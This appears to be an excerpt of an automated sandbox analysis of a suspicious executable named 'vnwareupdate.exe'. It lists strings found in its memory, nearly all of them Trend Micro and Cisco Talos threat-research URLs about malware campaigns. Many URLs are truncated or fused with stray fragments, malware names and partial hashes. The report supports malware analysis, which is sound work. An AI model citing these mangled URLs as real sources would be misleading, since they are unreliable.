Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackf6Following
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackfbFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackg
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackg-Following
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackgoFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackhrFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackjFFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackkeFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacklsFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackmpFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackp:Following
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackraFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackt
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackteFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackttFollowing
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blackwaFollowing
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-at
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-atCompromised
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-atStrider:
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/hddcryptor-updates-st
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-tar
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-tarBotnet
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-tarDCSO
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-tarKIVARS
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/latest-flash-exploit-
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/latest-flash-exploit-7Latest
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/latest-flash-exploit-Latest
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/latest-flash-exploit-ppendixes.pdf8
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-upd
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-comple
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/lurk-retracing-five-y
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/lurk-retracing-five-y8
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/lurk-retracing-five-yLurk:
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/lurk-retracing-five-yTerracotta
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kitenPlugX
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-posConnecting
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-posMajikPOS
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-fareit-strain-del
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-ghost-push-varian
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-retadup-variants-
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-retadup-variants-BlackOasis
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-retadup-variants-Industroyer
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-retadup-variants-New
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-targeted-attack-g
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/new-wannacry-mimickin
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-NewPosThings
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas.
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlasPoS
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlasRecent
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/operation-c-major-act
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-s
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-iosMicrosoft
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-iosPawn
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreo
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreoEPS
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreoPok
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/pornographic-themed-m
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-at
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-at#)RawPOS
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-at2
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-atF
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-atRawPOS
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-atV
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-atX
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-atm
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-ats
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-checking-in-atx
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze--1009---njrat-uncove
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-.Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-07Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-20Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-46Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-4aDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-54Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-5aDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-74Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-8bDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-9-Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-98Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-98bDaserf
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-Daserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-PTDaserf
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-Turla
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-_oDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-coDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-daDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-diDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-ment_crew_indicators
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-njDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-reThe
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-roDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-teDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-toDaserf
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-t
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-t9002
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-tMagic
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-tSandworm
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-tXData
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-us
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-usAttacks
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-usSigned
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-Locker:
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-SYSCON
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/the-siesta-campaign-a
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/the-significance-of-t
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/third-party-app-store
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/threat-actors-behind-
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/threat-actors-behind-BIFROSE
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/threat-actors-behind-Sandworm
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discoversKorplug
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discoversMalumPoS:
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/two-games-released-in
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-a
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/updated-sundown-exploUpdated
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/us-healthcare-organiz
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/us-healthcare-organizksUS
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://blog.trendmicro.com/trendlabs-security-intelligence/us-healthcare-organizulMultiple
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://blog.vectranetworks.com/blog/moonlight-middle-east-targeted-attacks
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/angler-update
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/angler-updateAngler
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/angler-updateSSH
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/angler-variants
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/angler-variantsAngler
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/angler-variantsGroup5:
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/darkkomet-rat-spam
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/darkkomet-rat-spamCOOLREAPER
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/darkkomet-rat-spamDing
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/darkkomet-rat-spamKaragany.B
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/darkkomet-rat-spamMalicious
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/fareit-analysis
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/malicious-pngs
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/malicious-pngs1fc6034b3ec99a01e3b2cde22846772656481d7374209ca0
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/malicious-pngs4124a533037373a922b01421caca3821af36099d98b7d6aa
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/malicious-pngs6b44c772bac7cc958b1b4535f02a584fc3a55377a3e7f4cc
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/malicious-pngsb4cb0490afa7da6647dc7f255a6c4c742b649fe4ff853b83
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/poseidon
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/poseidon4D938F4A5B3BAFB84CBD447FC3DCCACB;Destover
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/poseidonInfected
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/poseidonPoseidon
